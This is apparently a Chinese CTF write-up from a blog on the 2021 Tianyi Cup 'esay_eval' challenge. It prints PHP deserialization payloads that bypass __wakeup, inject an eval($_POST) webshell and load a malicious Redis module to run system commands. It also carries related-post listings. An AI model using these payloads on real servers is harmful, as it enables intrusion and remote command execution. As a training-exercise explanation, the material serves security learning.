[天翼杯 2021]esay_eval复现

最新推荐文章于 2024-03-31 01:34:38 发布
最新推荐文章于 2024-03-31 01:34:38 发布
阅读量3.4k 收藏 1
点赞数 4
分类专栏: 刷题记录 文章标签: linux ssh 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/121663060
版权
本文探讨了PHP中的反序列化绕过wakeup魔术方法的技巧,通过修改属性个数或类名大小写来规避。同时,介绍了如何利用Redis加载恶意SO文件获取shell,包括上传恶意文件到html目录,然后通过蚁剑连接Redis执行系统命令。整个过程涉及代码审计、正则匹配和命令执行等安全问题。
摘要由CSDN通过智能技术生成

考点

  • 反序列化绕过wakeup魔术方法
  • Redis加载恶意so文件获取shell

解题

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

前置:

__call(),在对象中调用一个不可访问方法时调用

代码审计,构造链子

<?php
class A{
    public $code = "phpinfo();";
    }
class B{
	public $a;
	}
$b = new B();
$b->a = new A();
echo urlencode(serialize($b));
// O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:10:"phpinfo();";}}

绕过wakeup方法

由于wakeup方法会把code置空,我们需要绕过该方法

正常来讲我们只需要修改:属性个数>真实属性个数

但是这里有正则需要保证属性的值为1

方法1:

增加真实属性的个数

O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:10:"phpinfo();";}s:1:"n":N;}

方法2:

类名是不区分大小写的,因此只要类名改成小写,绕wakeup修改改A和改B的属性数量都行

O:1:"b":3:{s:1:"a";O:1:"A":1:{s:4:"code";s:10:"phpinfo();";}}

image-20211201184559704查看disable function,命令执行函数都被过滤了

这里我们使用蚁剑连接

O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:16:"eval($_POST[1]);";}}

Redis加载恶意so获取shell

html目录下有config文件,里面有redis密码

image-20211201192914214

先在html目录下上传恶意so文件

文件地址

上传完成后使用蚁剑redis插件连接

image-20211201194046200

然后再加载

MODULE LOAD "/var/www/html/exp.so"
system.exec "whoami"

image-20211201194344101

之后便可以执行命令

system.exec "cat /f"
Snakin_ya
关注
专栏目录
[天翼 2021]esay_eval - RCE(disabled_function绕过||AS_Redis绕过)+反序列化(大小写&wakeup绕过)
oZuoShen123的博客
10-09 866
1、看代码,有unserialize函数,说明要反序列化 2、有 eval($this->code) ,说明要RCE 3、有preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);,说明要绕过waf 4、A的wakeup里面会把code置空,所以要绕过 起点:B(destruct)  终点:A(call) 链条:B(destruct::a=$a)-> A(call::code=命令)
天翼easy_eval复现
weixin_44687621的博客
09-25 1531
最近打了很多比赛,很多题没有做出来。所以决定复现一下某些题目。 本地环境的搭建 本地环境涉及到php的web服务、redis数据库。 Dockerfile的编写 FROM ubuntu:16.04 COPY src/sources.list /etc/apt/sources.list COPY src/redis-4.0.9 /home/redis-4.0.9 RUN apt-get update && \ apt-get install -y curl \
[天翼 2021]esay_eval
qq_61142406的博客
05-26 387
<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a();
ESAY_RE之没有main函数怎么办
gonna2011的博客
03-18 249
解题过程直接看大佬的https://blog.csdn.net/njh18790816639/article/details/112291179?spm=1001.2014.3001.5501 但是遇到这种没有主函数的题该怎么快速筛选出主要函数???和之前的Mysterious(攻防世界进阶区第一题)差不多,我遇到这种情况一般都是一个一个往下找的,但是这个题我get到一个奇怪的方法,先打开一下这个可执行文件是下面这个样子的:显示了input,说明input必在主函数中 两键shift+F12,找到主要内容
UR3机械臂使用kinect2相机利用easy_hand手眼标定
SpengTAN的博客
05-15 3004
1.下载easy_handeye(标定的工具包) https://github.com/IFL-CAMP/easy_handeye 2.下载vision_visp(标定过程调用) https://github.com/lagadic/vision_visp 下载aruco_ros(标定过程调用) https://github.com/pal-robotics/aruco_ros 进入/cat...
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7747
攻防世界 -- very_easy_sql
2021 天翼easy_eval
m0_56059226的博客
10-04 2384
打开环境 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a-&gt
[天翼 2021]esay_eval复现
qq_53460654的博客
12-17 3101
<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a();
[天翼 2021]esay_eval WP
最新发布
wikey 的博客
03-31 1579
得到了payload:?}}直接不犹豫连接蚁剑.当我们以为就此结束可以拿到flag我们点击根目录发现这个shell没有访问权限,但是在/var/www/html中有上传权限,所以可以通过上传恶意的so文件,通过蚁剑的redis管理插件,进行ssrf,然后包含恶意so文件(:因为插件市场这个东西,国内基本是访问不到,我在用蚁剑访问的时候,就一直转圈圈转不出来,所以可以使用github的插件仓库下载插件,然后手动放到。
[天翼 2021]esay_eval-----记Redis提权
qq_73767109的博客
06-25 228
一旦攻击者获得了访问权限,他们就可以上传 exp.so 文件到 Redis 服务器中,并使用 Redis 的 module load 命令加载这个文件。exp.so 文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。Vim缓存泄露指的是当用户在Vim编辑器中打开了一个文件,并进行了修改,然后使用了Vim或其他工具关闭了该文件,但Vim缓存中仍然保留着该文件的副本,从而导致该文件中的敏感信息(例如密码、私密密钥等)泄露的漏洞。
『CTF Web复现』[2021 天翼]easy_eval
Ho1aAs‘s Blog
09-23 1212
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
esay excel
09-02
EasyExcel是一个基于Java的开源项目,用于简化读写Excel的操作。它在尽可能节约内存的情况下,支持读写百M级别的Excel文件。相比于其他的Java处理Excel的框架,如Apache POI和jxl,EasyExcel具有更低的内存消耗。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值